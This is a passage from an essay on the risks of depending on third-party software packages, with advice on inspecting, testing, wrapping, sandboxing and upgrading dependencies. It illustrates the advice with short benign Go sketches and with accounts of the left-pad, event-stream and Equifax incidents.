But NPM has driven the overhead approximately to zero,
with the result that nearly-trivial functionality
can be packaged and reused.
As of late January 2019, the <code>escape-string-regexp</code> package
is explicitly depended upon by almost a thousand
other NPM packages,
not to mention all the packages developers write for their own use
and don’t share.
<p>
Dependency managers now exist for essentially every programming language.
Maven Central (Java),
Nuget (.NET),
Packagist (PHP),
PyPI (Python),
and RubyGems (Ruby)
each host over 100,000 packages.
The arrival of this kind of fine-grained, widespread software reuse
is one of the most consequential shifts in software development
over the past two decades.
And if we’re not more careful, it will lead to serious problems.
<a class=anchor href="#what_could_go_wrong"><h2 id="what_could_go_wrong">What could go wrong?</h2></a>
<p>
A package, for this discussion, is code you download from the internet.
Adding a package as a dependency outsources the work of developing that
code—designing, writing, testing, debugging, and maintaining—to
someone else on the internet,
someone you often don’t know.
By using that code, you are exposing your own program
to all the failures and flaws in the dependency.
Your program’s execution now literally <i>depends</i>
on code downloaded from this stranger on the internet.
Presented this way, it sounds incredibly unsafe.
Why would anyone do this?
<p>
We do this because it’s easy,
because it seems to work,
because everyone else is doing it too,
and, most importantly, because
it seems like a natural continuation of
age-old established practice.
But there are important differences we’re ignoring.
<p>
Decades ago, most developers already
trusted others to write software they depended on,
such as operating systems and compilers.
That software was bought from known sources,
often with some kind of support agreement.
There was still a potential for bugs or outright mischief,<sup class=footnote><a class=footnote id=fnref-3 href='#fn-3'>3</a></sup>
but at least we knew who we were dealing with and usually
had commercial or legal recourses available.
<p>
The phenomenon of open-source software,
distributed at no cost over the internet,
has displaced many of those earlier software purchases.
When reuse was difficult, there were fewer projects publishing reusable code packages.
Even though their licenses typically disclaimed, among other things,
any “implied warranties of merchantability and fitness for
a particular purpose,”
the projects built up well-known reputations
that often factored heavily into people’s decisions about which to use.
The commercial and legal support for trusting our software sources
was replaced by reputational support.
Many common early packages still enjoy good reputations:
consider BLAS (published 1979), Netlib (1987), libjpeg (1991),
LAPACK (1992), HP STL (1994), and zlib (1995).
<p>
Dependency managers have scaled this open-source code reuse model down:
now, developers can share code at the granularity of
individual functions of tens of lines.
This is a major technical accomplishment.
There are myriad available packages,
and writing code can involve a great many of them,
but the commercial, legal, and reputational support mechanisms
for trusting the code have not carried over.
We are trusting more code with less justification for doing so.
<p>
The cost of adopting a bad dependency can be viewed
as the sum, over all possible bad outcomes,
of the cost of each bad outcome
multiplied by its probability of happening (risk).
<p>
<img name="deps-cost" class="center pad" width=383 height=95 src="deps-cost.png" srcset="deps-cost.png 1x, deps-cost@1.5x.png 1.5x, deps-cost@2x.png 2x, deps-cost@3x.png 3x, deps-cost@4x.png 4x">
<p>
The context where a dependency will be used
determines the cost of a bad outcome.
At one end of the spectrum is a personal hobby project,
where the cost of most bad outcomes
is near zero:
you’re just having fun, bugs have no real impact other than
wasting some time, and even debugging them can be fun.
So the risk probability almost doesn’t matter: it’s being multiplied by zero.
At the other end of the spectrum is production software
that must be maintained for years.
Here, the cost of a bug in
a dependency can be very high:
servers may go down,
sensitive data may be divulged,
customers may be harmed,
companies may fail.
High failure costs make it much more important
to estimate and then reduce any risk of a serious failure.
<p>
No matter what the expected cost,
experiences with larger dependencies
suggest some approaches for
estimating and reducing the risks of adding a software dependency.
It is likely that better tooling is needed to help reduce
the costs of these approaches,
much as dependency managers have focused to date on
reducing the costs of download and installation.
<a class=anchor href="#inspect_the_dependency"><h2 id="inspect_the_dependency">Inspect the dependency</h2></a>
<p>
You would not hire a software developer you’ve never heard of
and know nothing about.
You would learn more about them first:
check references, conduct a job interview,
run background checks, and so on.
Before you depend on a package you found on the internet,
it is similarly prudent
to learn a bit about it first.
<p>
A basic inspection can give you a sense
of how likely you are to run into problems trying to use this code.
If the inspection reveals likely minor problems,
you can take steps to prepare for or maybe avoid them.
If the inspection reveals major problems,
it may be best not to use the package:
maybe you’ll find a more suitable one,
or maybe you need to develop one yourself.
Remember that open-source packages are published
by their authors in the hope that they will be useful
but with no guarantee of usability or support.
In the middle of a production outage, you’ll be the one debugging it.
As the original GNU General Public License warned,
“The entire risk as to the quality and performance of the
program is with you.
Should the program prove defective, you assume the cost of all
necessary servicing, repair or correction.”<sup class=footnote><a class=footnote id=fnref-4 href='#fn-4'>4</a></sup>
<p>
The rest of this section outlines some considerations when inspecting a package
and deciding whether to depend on it.
<a class=anchor href="#design"><h3 id="design">Design</h3></a>
<p>
Is the package’s documentation clear? Does the API have a clear design?
If the authors can explain the package’s API and its design well to you, the user,
in the documentation,
that increases the likelihood they have explained the implementation well to the computer, in the source code.
Writing code for a clear, well-designed API is also easier, faster, and hopefully less error-prone.
Have the authors documented what they expect from client code
in order to make future upgrades compatible?
(Examples include the C++<sup class=footnote><a class=footnote id=fnref-5 href='#fn-5'>5</a></sup> and Go<sup class=footnote><a class=footnote id=fnref-6 href='#fn-6'>6</a></sup> compatibility documents.)
<a class=anchor href="#code_quality"><h3 id="code_quality">Code Quality</h3></a>
<p>
Is the code well-written?
Read some of it.
Does it look like the authors have been careful, conscientious, and consistent?
Does it look like code you’d want to debug? You may need to.
<p>
Develop your own systematic ways to check code quality.
For example, something as simple as compiling a C or C++ program with
important compiler warnings enabled (for example, <code>-Wall</code>)
can give you a sense of how seriously the developers work to avoid
various undefined behaviors.
Recent languages like Go, Rust, and Swift use an <code>unsafe</code> keyword to mark
code that violates the type system; look to see how much unsafe code there is.
More advanced semantic tools like Infer<sup class=footnote><a class=footnote id=fnref-7 href='#fn-7'>7</a></sup> or SpotBugs<sup class=footnote><a class=footnote id=fnref-8 href='#fn-8'>8</a></sup> are helpful too.
Linters are less helpful: you should ignore rote suggestions
about topics like brace style and focus instead on semantic problems.
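<p>
As one concrete illustration of a systematic check, the short Go program below
walks a source tree and prints every file that imports the <code>unsafe</code> package.
It is only a sketch: the directory argument and the idea of treating
<code>unsafe</code> imports as a rough quality signal are assumptions of the example,
not a standard tool. But it shows how little code such a check requires.
<pre class="indent">
package main

import (
	"fmt"
	"go/parser"
	"go/token"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

func main() {
	root := "." // directory holding the dependency's source
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	fset := token.NewFileSet()
	filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() || !strings.HasSuffix(path, ".go") {
			return err
		}
		// Parse only the import block; skip files that don't parse.
		f, perr := parser.ParseFile(fset, path, nil, parser.ImportsOnly)
		if perr != nil {
			return nil
		}
		for _, imp := range f.Imports {
			if imp.Path.Value == `"unsafe"` {
				fmt.Println(path)
			}
		}
		return nil
	})
}
</pre>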
<p>
Keep an open mind to development practices you may not be familiar with.
For example, the SQLite library ships as a single 200,000-line C source file
and a single 11,000-line header, the “amalgamation.”
The sheer size of these files should raise an initial red flag,
but closer investigation would turn up the
actual development source code, a traditional file tree with
over a hundred C source files, tests, and support scripts.
It turns out that the single-file distribution is built automatically from the original sources
and is easier for end users, especially those without dependency managers.
(The compiled code also runs faster, because the compiler can see more optimization opportunities.)
<a class=anchor href="#testing"><h3 id="testing">Testing</h3></a>
<p>
Does the code have tests?
Can you run them?
Do they pass?
Tests establish that the code’s basic functionality is correct,
and they signal that the developer is serious about keeping it correct.
For example, the SQLite development tree has an incredibly thorough test suite
with over 30,000 individual test cases
as well as developer documentation explaining the testing strategy.<sup class=footnote><a class=footnote id=fnref-9 href='#fn-9'>9</a></sup>
On the other hand,
if there are few tests or no tests, or if the tests fail, that’s a serious red flag:
future changes to the package
are likely to introduce regressions that could easily have been caught.
If you insist on tests in code you write yourself (you do, right?),
you should insist on tests in code you outsource to others.
<p>
Assuming the tests exist, run, and pass, you can gather more
information by running them with run-time instrumentation
like code coverage analysis, race detection,<sup class=footnote><a class=footnote id=fnref-10 href='#fn-10'>10</a></sup>
memory allocation checking,
and memory leak detection.
<a class=anchor href="#debugging"><h3 id="debugging">Debugging</h3></a>
<p>
Find the package’s issue tracker.
Are there many open bug reports? How long have they been open?
Are there many fixed bugs? Have any bugs been fixed recently?
If you see lots of open issues about what look like real bugs,
especially if they have been open for a long time,
that’s not a good sign.
On the other hand, if the closed issues show that bugs are
rarely found and promptly fixed,
that’s great.
<a class=anchor href="#maintenance"><h3 id="maintenance">Maintenance</h3></a>
<p>
Look at the package’s commit history.
How long has the code been actively maintained?
Is it actively maintained now?
Packages that have been actively maintained for an extended
amount of time are more likely to continue to be maintained.
How many people work on the package?
Many packages are personal projects that developers
create and share for fun in their spare time.
Others are the result of thousands of hours of work
by a group of paid developers.
In general, the latter kind of package is more likely to have
prompt bug fixes, steady improvements, and general upkeep.
<p>
On the other hand, some code really is “done.”
For example, NPM’s <code>escape-string-regexp</code>,
shown earlier, may never need to be modified again.
<a class=anchor href="#usage"><h3 id="usage">Usage</h3></a>
<p>
Do many other packages depend on this code?
Dependency managers can often provide statistics about usage,
or you can use a web search to estimate how often
others write about using the package.
More users should at least mean more people for whom
the code works well enough,
along with faster detection of new bugs.
Widespread usage is also a hedge against the question of continued maintenance:
if a widely-used package loses its maintainer,
an interested user is likely to step forward.
<p>
For example, libraries like PCRE or Boost or JUnit
are incredibly widely used.
That makes it more likely—although certainly not guaranteed—that
bugs you might otherwise run into have already been fixed,
because others ran into them first.
<a class=anchor href="#security"><h3 id="security">Security</h3></a>
<p>
Will you be processing untrusted inputs with the package?
If so, does it seem to be robust against malicious inputs?
Does it have a history of security problems
listed in the National Vulnerability Database (NVD)?<sup class=footnote><a class=footnote id=fnref-11 href='#fn-11'>11</a></sup>
<p>
For example, when Jeff Dean and I started work on
Google Code Search<sup class=footnote><a class=footnote id=fnref-12 href='#fn-12'>12</a></sup>—<code>grep</code> over public source code—in 2006,
the popular PCRE regular expression library seemed like an obvious choice.
In an early discussion with Google’s security team, however,
we learned that PCRE had a history of problems like buffer overflows,
especially in its parser.
We could have learned the same by searching for PCRE in the NVD.
That discovery didn’t immediately cause us to abandon PCRE,
but it did make us think more carefully about testing and isolation.
<a class=anchor href="#licensing"><h3 id="licensing">Licensing</h3></a>
<p>
Is the code properly licensed?
Does it have a license at all?
Is the license acceptable for your project or company?
A surprising fraction of projects on GitHub have no clear license.
Your project or company may impose further restrictions on the
allowed licenses of dependencies.
For example, Google disallows the use of code licensed under
AGPL-like licenses (too onerous) as well as WTFPL-like licenses (too vague).<sup class=footnote><a class=footnote id=fnref-13 href='#fn-13'>13</a></sup>
<a class=anchor href="#dependencies"><h3 id="dependencies">Dependencies</h3></a>
<p>
Does the code have dependencies of its own?
Flaws in indirect dependencies are just as bad for your program
as flaws in direct dependencies.
Dependency managers can list all the transitive dependencies
of a given package, and each of them should ideally be inspected as
described in this section.
A package with many dependencies incurs additional inspection work,
because those same dependencies incur additional risk
that needs to be evaluated.
<p>
Many developers have never looked at the full list of transitive
dependencies of their code and don’t know what they depend on.
For example, in March 2016 the NPM user community discovered
that many popular projects—including Babel, Ember, and React—all depended
indirectly on a tiny package called <code>left-pad</code>,
consisting of a single 8-line function body.
They discovered this when
the author of <code>left-pad</code> deleted that package from NPM,
inadvertently breaking most Node.js users’ builds.<sup class=footnote><a class=footnote id=fnref-14 href='#fn-14'>14</a></sup>
And <code>left-pad</code> is hardly exceptional in this regard.
For example, 30% of the
750,000 packages published on NPM
depend—at least indirectly—on <code>escape-string-regexp</code>.
Adapting Leslie Lamport’s observation about distributed systems,
a dependency manager can easily
create a situation in which the failure of a package you didn’t
even know existed can render your own code unusable.
<a class=anchor href="#test_the_dependency"><h2 id="test_the_dependency">Test the dependency</h2></a>
<p>
The inspection process should include running a package’s own tests.
If the package passes the inspection and you decide to make your
project depend on it,
the next step should be to write new tests focused on the functionality
needed by your application.
These tests often start out as short standalone programs
written to make sure you can understand the package’s API
and that it does what you think it does.
(If you can’t or it doesn’t, turn back now!)
It is worth then taking the extra effort to turn those programs
into automated tests that can be run against newer versions of the package.
If you find a bug and have a potential fix,
you’ll want to be able to rerun these project-specific tests
easily, to make sure that the fix did not break anything else.
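<p>
For example, a project-specific test in Go might take the shape of the sketch below,
using the standard <code>regexp</code> package as a stand-in for whatever dependency
you are evaluating; the package name, pattern, and inputs are hypothetical.
A test like this, kept in your own repository, can be rerun unchanged
against each new version of the dependency.
<pre class="indent">
package mydeps_test // hypothetical package name

import (
	"regexp"
	"testing"
)

// TestRegexpBehavior checks only the behavior this project relies on:
// anchored matching of lowercase words and rejection of empty input.
func TestRegexpBehavior(t *testing.T) {
	re := regexp.MustCompile(`^[a-z]+$`)
	cases := []struct {
		in   string
		want bool
	}{
		{"hello", true},
		{"Hello", false},
		{"", false},
	}
	for _, c := range cases {
		if got := re.MatchString(c.in); got != c.want {
			t.Errorf("MatchString(%q) = %v, want %v", c.in, got, c.want)
		}
	}
}
</pre>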
<p>
It is especially worth exercising the likely problem areas
identified by the
basic inspection.
For Code Search, we knew from past experience
that PCRE sometimes took
a long time to execute certain regular expression searches.
Our initial plan was to have separate thread pools for
“simple” and “complicated” regular expression searches.
One of the first tests we ran was a benchmark,
comparing <code>pcregrep</code> with a few other <code>grep</code> implementations.
When we found that, for one basic test case,
<code>pcregrep</code> was 70X slower than the
fastest <code>grep</code> available,
we started to rethink our plan to use PCRE.
Even though we eventually dropped PCRE entirely,
that benchmark remains in our code base today.
<a class=anchor href="#abstract_the_dependency"><h2 id="abstract_the_dependency">Abstract the dependency</h2></a>
<p>
Depending on a package is a decision that you are likely to
revisit later.
Perhaps updates will take the package in a new direction.
Perhaps serious security problems will be found.
Perhaps a better option will come along.
For all these reasons, it is worth the effort
to make it easy to migrate your project to a new dependency.
<p>
If the package will be used from many places in your project’s source code,
migrating to a new dependency would require making
changes to all those different source locations.
Worse, if the package will be exposed in your own project’s API,
migrating to a new dependency would require making
changes in all the code calling your API,
which you might not control.
To avoid these costs, it makes sense to
define an interface of your own,
along with a thin wrapper implementing that
interface using the dependency.
Note that the wrapper should include only
what your project needs from the dependency,
not everything the dependency offers.
Ideally, that allows you to
substitute a different, equally appropriate dependency later,
by changing only the wrapper.
Migrating your per-project tests to use the new interface
tests the interface and wrapper implementation
and also makes it easy to test any potential replacements
for the dependency.
<p>
For Code Search, we developed an abstract <code>Regexp</code> class
that defined the interface Code Search needed from any
regular expression engine.
Then we wrote a thin wrapper around PCRE
implementing that interface.
The indirection made it easy to test alternate libraries,
and it kept us from accidentally introducing knowledge
of PCRE internals into the rest of the source tree.
That in turn ensured that it would be easy to switch
to a different dependency if needed.
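<p>
A minimal Go sketch of that pattern might look like the following.
The <code>Matcher</code> interface and the use of the standard <code>regexp</code> package
as the wrapped engine are illustrative assumptions, not the actual Code Search
implementation; the shape is what matters.
The rest of the project imports only this package, never the engine directly,
so replacing the engine means changing one file and rerunning the
project-specific tests.
<pre class="indent">
package match

import "regexp"

// Matcher is the only behavior this project needs from a
// regular expression engine.
type Matcher interface {
	Match(line []byte) bool
}

// stdMatcher is a thin wrapper implementing Matcher using the
// standard library's regexp package.
type stdMatcher struct {
	re *regexp.Regexp
}

// New compiles pattern with the current engine.
// Swapping engines later means changing only this file.
func New(pattern string) (Matcher, error) {
	re, err := regexp.Compile(pattern)
	if err != nil {
		return nil, err
	}
	return stdMatcher{re: re}, nil
}

func (m stdMatcher) Match(line []byte) bool {
	return m.re.Match(line)
}
</pre>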
<a class=anchor href="#isolate_the_dependency"><h2 id="isolate_the_dependency">Isolate the dependency</h2></a>
<p>
It may also be appropriate to isolate a dependency
at run-time, to limit the possible damage caused by bugs in it.
For example, Google Chrome allows users to add dependencies—extension code—to the browser.
When Chrome launched in 2008, it introduced
the critical feature (now standard in all browsers)
of isolating each extension in a sandbox running in a separate
operating-system process.<sup class=footnote><a class=footnote id=fnref-15 href='#fn-15'>15</a></sup>
An exploitable bug in a badly-written extension
therefore did not automatically have access to the entire memory
of the browser itself
and could be stopped from making inappropriate system calls.<sup class=footnote><a class=footnote id=fnref-16 href='#fn-16'>16</a></sup>
For Code Search, until we dropped PCRE entirely,
our plan was to isolate at least the PCRE parser
in a similar sandbox.
Today,
another option would be a lightweight hypervisor-based sandbox
like gVisor.<sup class=footnote><a class=footnote id=fnref-17 href='#fn-17'>17</a></sup>
Isolating dependencies
reduces the associated risks of running that code.
<p>
Even with these examples and other off-the-shelf options,
run-time isolation of suspect code is still too difficult and rarely done.
True isolation would require a completely memory-safe language,
with no escape hatch into untyped code.
That’s challenging not just in entirely unsafe languages like C and C++
but also in languages that provide restricted unsafe operations,
like Java when including JNI, or like Go, Rust, and Swift
when including their “unsafe” features.
Even in a memory-safe language like JavaScript,
code often has access to far more than it needs.
In November 2018, the latest version of the NPM package <code>event-stream</code>,
which provided a functional streaming API for JavaScript events,
was discovered to contain obfuscated malicious code that had been
added two and a half months earlier.
The code, which harvested large Bitcoin wallets from users of the Copay mobile app,
was accessing system resources entirely unrelated to processing
event streams.<sup class=footnote><a class=footnote id=fnref-18 href='#fn-18'>18</a></sup>
One of many possible defenses to this kind of problem
would be to better restrict what dependencies can access.
<a class=anchor href="#avoid_the_dependency"><h2 id="avoid_the_dependency">Avoid the dependency</h2></a>
<p>
If a dependency seems too risky and you can’t find
a way to isolate it, the best answer may be to avoid it entirely,
or at least to avoid the parts you’ve identified as most problematic.
<p>
For example, as we better understood the risks and costs associated
with PCRE, our plan for Google Code Search evolved
from “use PCRE directly,” to “use PCRE but sandbox the parser,”
to “write a new regular expression parser but keep the PCRE execution engine,”
to “write a new parser and connect it to a different, more efficient open-source execution engine.”
Later we rewrote the execution engine as well,
so that no dependencies were left,
and we open-sourced the result: RE2.<sup class=footnote><a class=footnote id=fnref-19 href='#fn-19'>19</a></sup>
<p>
If you only need a
tiny fraction of a dependency,
it may be simplest to make a copy of what you need
(preserving appropriate copyright and other legal notices, of course).
You are taking on responsibility for fixing bugs, maintenance, and so on,
but you’re also completely isolated from the larger risks.
The Go developer community has a proverb about this:
“A little copying is better than a little dependency.”<sup class=footnote><a class=footnote id=fnref-20 href='#fn-20'>20</a></sup>
<a class=anchor href="#upgrade_the_dependency"><h2 id="upgrade_the_dependency">Upgrade the dependency</h2></a>
<p>
For a long time, the conventional wisdom about software was “if it ain’t broke, don’t fix it.”
Upgrading carries a chance of introducing new bugs;
without a corresponding reward—like a new feature you need—why take the risk?
This analysis ignores two costs.
The first is the cost of the eventual upgrade.
In software, the difficulty of making code changes does not scale linearly:
making ten small changes is less work and easier to get right
than making one equivalent large change.
The second is the cost of discovering already-fixed bugs the hard way.
Especially in a security context, where known bugs are actively exploited,
every day you wait is another day that attackers can break in.
<p>
For example, consider the year 2017 at Equifax, as recounted by executives
in detailed congressional testimony.<sup class=footnote><a class=footnote id=fnref-21 href='#fn-21'>21</a></sup>
On March 7, a new vulnerability in Apache Struts was disclosed, and a patched version was released.
On March 8, Equifax received a notice from US-CERT about the need to update
any uses of Apache Struts.
Equifax ran source code and network scans on March 9 and March 15, respectively;
neither scan turned up a particular group of public-facing web servers.
On May 13, attackers found the servers that Equifax’s security teams could not.
They used the Apache Struts vulnerability to breach Equifax’s network
and then steal detailed personal and financial information
about 148 million people
over the next two months.
Equifax finally noticed the breach on July 29
and publicly disclosed it on September 4.
By the end of September, Equifax’s CEO, CIO, and CSO had all resigned,
and a congressional investigation was underway.
<p>
Equifax’s experience drives home the point that
although dependency managers know the versions they are using at build time,
you need other arrangements to track that information
through your production deployment process.
For the Go language, we are experimenting with automatically
including a version manifest in every binary, so that deployment
processes can scan binaries for dependencies that need upgrading.
Go also makes that information available at run-time, so that
servers can consult databases of known bugs and self-report to
monitoring software when they are in need of upgrades.
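<p>
That run-time information is exposed to the program itself through the
<code>runtime/debug</code> package.
A minimal sketch of a server reporting its own dependency versions might
look like this; how the list gets matched against a vulnerability database
is left out.
<pre class="indent">
package main

import (
	"fmt"
	"runtime/debug"
)

func main() {
	info, ok := debug.ReadBuildInfo()
	if !ok {
		fmt.Println("no module information recorded in this binary")
		return
	}
	fmt.Println("main module:", info.Main.Path, info.Main.Version)
	for _, dep := range info.Deps {
		// A real server might report this list to monitoring or
		// check it against a database of known-vulnerable versions.
		fmt.Println("dependency:", dep.Path, dep.Version)
	}
}
</pre>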
<p>
Upgrading promptly is important, but upgrading means
adding new code to your project,
which should mean updating your evaluation of the risks
of using the dependency based on the new version.
At a minimum, you’d want to skim the diffs showing the
changes being made from the current version to the
upgraded versions,
or at least read the release notes,
to identify the most likely areas of concern in the upgraded code.
If a lot of code is changing, so that the diffs are difficult to digest,
that is also information you can incorporate into your
risk assessment update.
<p>
You’ll also want to re-run the tests you’ve written
that are specific to your project,
to make sure the upgraded package is at least as suitable
for the project as the earlier version.
It also makes sense to re-run the package’s own tests.
If the package has its own dependencies,
it is entirely possible that your project’s configuration
uses different versions of those dependencies
(either older or newer ones) than the package’s authors use.
Running the package’s own tests can quickly identify problems
specific to your configuration.
<p>
Again, upgrades should not be completely automatic.
You need to verify that the upgraded versions are appropriate for
your environment before deploying them.<sup class=footnote><a class=footnote id=fnref-22 href='#fn-22'>22</a></sup>
<p>
If your upgrade process includes re-running the
integration and qualification tests you’ve already written for the dependency,
so that you are likely to identify new problems before they reach production,
then, in most cases, delaying an upgrade is riskier than upgrading quickly.
<p>
The window for security-critical upgrades is especially short.
In the aftermath of the Equifax breach, forensic security teams found
evidence that attackers (perhaps different ones)
had successfully exploited the Apache Struts
vulnerability on the affected servers on March 10, only three days
after it was publicly disclosed, but they’d only run a single <code>whoami</code> command.
<a class=anchor href="#watch_your_dependencies"><h2 id="watch_your_dependencies">Watch your dependencies</h2></a>
<p>
Even after all that work, you’re not done tending your dependencies.
It’s important to continue to monitor them and perhaps even
re-evaluate your decision to use them.
<p>
First, make sure that you keep using the
specific package versions you think you are.
Most dependency managers now make it easy or even automatic
to record the cryptographic hash of the expected source code
for a given package version
and then to check that hash when re-downloading the package
on another computer or in a test environment.
This ensures that your builds use
the same dependency source code you inspected and tested.
These kinds of checks
prevented the <code>event-stream</code> attacker,
described earlier, from silently inserting
malicious code in the already-released version 3.3.5.
Instead, the attacker had to create a new version, 3.3.6,
and wait for people to upgrade (without looking closely at the changes).
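<p>
The check itself is simple.
A minimal Go sketch of the kind of verification a dependency manager performs
might look like this; the archive name and expected hash are placeholders.
<pre class="indent">
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
)

// verify reports whether the downloaded archive at path still matches
// the hash recorded when the dependency was first inspected and tested.
func verify(path, wantHex string) error {
	data, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	sum := sha256.Sum256(data)
	if hex.EncodeToString(sum[:]) != wantHex {
		return fmt.Errorf("%s: content does not match recorded hash", path)
	}
	return nil
}

func main() {
	// Placeholder file name and hash, for illustration only.
	if err := verify("dep-1.2.3.zip", "0123456789abcdef..."); err != nil {
		fmt.Println("verification failed:", err)
	}
}
</pre>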
<p>
It is also important to watch for new indirect dependencies creeping in:
upgrades can easily introduce new packages
upon which the success of your project now depends.
They deserve your attention as well.
In the case of <code>event-stream</code>, the malicious code was
hidden in a different package, <code>flatmap-stream</code>,
which the new <code>event-stream</code> release added as a
new dependency.
<p>
Creeping dependencies can also affect the size of your project.
During the development of Google’s Sawzall<sup class=footnote><a class=footnote id=fnref-23 href='#fn-23'>23</a></sup>—a JIT’ed
logs processing language—the authors discovered at various times that
the main interpreter binary contained not just Sawzall’s JIT
but also (unused) PostScript, Python, and JavaScript interpreters.
Each time, the culprit turned out to be unused dependencies
declared by some library Sawzall did depend on,
combined with the fact that Google’s build system
eliminated any manual effort needed to start using a new dependency.
This kind of error is the reason that the Go language
makes importing an unused package a compile-time error.
<p>
Upgrading is a natural time to revisit the decision to use a dependency that’s changing.
It’s also important to periodically revisit any dependency that <i>isn’t</i> changing.
Does it seem plausible that there are no security problems or other bugs to fix?
Has the project been abandoned?
Maybe it’s time to start planning to replace that dependency.
<p>
It’s also important to recheck the security history of each dependency.
For example, Apache Struts disclosed different major remote code execution
vulnerabilities in 2016, 2017, and 2018.
Even if you have a list of all the servers that run it and
update them promptly, that track record might make you rethink using it at all.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
Software reuse is finally here,
and I don’t mean to understate its benefits:
it has brought an enormously positive transformation
for software developers.
Even so, we’ve accepted this transformation without
completely thinking through the potential consequences.
The old reasons for trusting dependencies are becoming less valid
at exactly the same time we have more dependencies than ever.
<p>
The kind of critical examination of specific dependencies that
I outlined in this article is a significant amount of work
and remains the exception rather than the rule.
But I doubt there are any developers who actually
make the effort to do this for every possible new dependency.
I have only done a subset of these checks for a subset of my own dependencies.
Most of the time the entirety of the decision is “let’s see what happens.”
Too often, anything more than that seems like too much effort.
<p>
But the Copay and Equifax attacks are clear warnings of
real problems in the way we consume software dependencies today.
We should not ignore the warnings.
I offer three broad recommendations.
<ol>
<li>
<p>
<i>Recognize the problem.</i>
If nothing else, I hope this article has convinced
you that there is a problem here worth addressing.
We need many people to focus significant effort on solving it.
<li>
<p>
<i>Establish best practices for today.</i>
We need to establish best practices for managing dependencies
using what’s available today.
This means working out processes that evaluate, reduce, and track risk,
from the original adoption decision through to production use.
In fact, just as some engineers specialize in testing,
it may be that we need engineers who specialize in managing dependencies.
<li>
<p>
<i>Develop better dependency technology for tomorrow.</i>
Dependency managers have essentially eliminated the cost of
downloading and installing a dependency.
Future development effort should focus on reducing the cost of
the kind of evaluation and maintenance necessary to use
a dependency.
For example, package discovery sites might work to find
more ways to allow developers to share their findings.
Build tools should, at the least, make it easy to run a package’s own tests.
More aggressively,
build tools and package management systems could also work together
to allow package authors to test new changes against all public clients
of their APIs.
Languages should also provide easy ways to isolate a suspect package.</ol>
<p>
There’s a lot of good software out there.
Let’s work together to find out how to reuse it safely.
<p>
<a class=anchor href="#references"><h2 id="references">References</h2></a>
<ol class=fn>
<li id=fn-1>
Rachel Potvin and Josh Levenberg, “Why Google Stores Billions of Lines of Code in a Single Repository,” <i>Communications of the ACM</i> 59(7) (July 2016), pp. 78-87. <a href="https://doi.org/10.1145/2854146">https://doi.org/10.1145/2854146</a> <a class=fnref href='#fnref-1'>↩</a>
<li id=fn-2>
Russ Cox, “Go & Versioning,” February 2018. <a href="https://research.swtch.com/vgo">https://research.swtch.com/vgo</a> <a class=fnref href='#fnref-2'>↩</a>
<li id=fn-3>
Ken Thompson, “Reflections on Trusting Trust,” <i>Communications of the ACM</i> 27(8) (August 1984), pp. 761–763. <a href="https://doi.org/10.1145/358198.358210">https://doi.org/10.1145/358198.358210</a> <a class=fnref href='#fnref-3'>↩</a>
<li id=fn-4>
GNU Project, “GNU General Public License, version 1,” February 1989. <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html">https://www.gnu.org/licenses/old-licenses/gpl-1.0.html</a> <a class=fnref href='#fnref-4'>↩</a>
<li id=fn-5>
Titus Winters, “SD-8: Standard Library Compatibility,” C++ Standing Document, August 2018. <a href="https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility">https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility</a> <a class=fnref href='#fnref-5'>↩</a>
<li id=fn-6>
Go Project, “Go 1 and the Future of Go Programs,” September 2013. <a href="https://golang.org/doc/go1compat">https://golang.org/doc/go1compat</a> <a class=fnref href='#fnref-6'>↩</a>
<li id=fn-7>
Facebook, “Infer: A tool to detect bugs in Java and C/C++/Objective-C code before it ships.” <a href="https://fbinfer.com/">https://fbinfer.com/</a> <a class=fnref href='#fnref-7'>↩</a>
<li id=fn-8>
“SpotBugs: Find bugs in Java Programs.” <a href="https://spotbugs.github.io/">https://spotbugs.github.io/</a> <a class=fnref href='#fnref-8'>↩</a>
<li id=fn-9>
D. Richard Hipp, “How SQLite is Tested.” <a href="https://www.sqlite.org/testing.html">https://www.sqlite.org/testing.html</a> <a class=fnref href='#fnref-9'>↩</a>
<li id=fn-10>
Alexander Potapenko, “Testing Chromium: ThreadSanitizer v2, a next-gen data race detector,” April 2014. <a href="https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html">https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html</a> <a class=fnref href='#fnref-10'>↩</a>
<li id=fn-11>
NIST, “National Vulnerability Database – Search and Statistics.” <a href="https://nvd.nist.gov/vuln/search">https://nvd.nist.gov/vuln/search</a> <a class=fnref href='#fnref-11'>↩</a>
<li id=fn-12>
Russ Cox, “Regular Expression Matching with a Trigram Index, or How Google Code Search Worked,” January 2012. <a href="https://swtch.com/~rsc/regexp/regexp4.html">https://swtch.com/~rsc/regexp/regexp4.html</a> <a class=fnref href='#fnref-12'>↩</a>
<li id=fn-13>
Google, “Google Open Source: Using Third-Party Licenses.” <a href="https://opensource.google.com/docs/thirdparty/licenses/#banned">https://opensource.google.com/docs/thirdparty/licenses/#banned</a> <a class=fnref href='#fnref-13'>↩</a>
<li id=fn-14>
Nathan Willis, “A single Node of failure,” LWN, March 2016. <a href="https://lwn.net/Articles/681410/">https://lwn.net/Articles/681410/</a> <a class=fnref href='#fnref-14'>↩</a>
<li id=fn-15>
Charlie Reis, “Multi-process Architecture,” September 2008. <a href="https://blog.chromium.org/2008/09/multi-process-architecture.html">https://blog.chromium.org/2008/09/multi-process-architecture.html</a> <a class=fnref href='#fnref-15'>↩</a>
<li id=fn-16>
Adam Langley, “Chromium’s seccomp Sandbox,” August 2009. <a href="https://www.imperialviolet.org/2009/08/26/seccomp.html">https://www.imperialviolet.org/2009/08/26/seccomp.html</a> <a class=fnref href='#fnref-16'>↩</a>
<li id=fn-17>
Nicolas Lacasse, “Open-sourcing gVisor, a sandboxed container runtime,” May 2018. <a href="https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime">https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime</a> <a class=fnref href='#fnref-17'>↩</a>
<li id=fn-18>
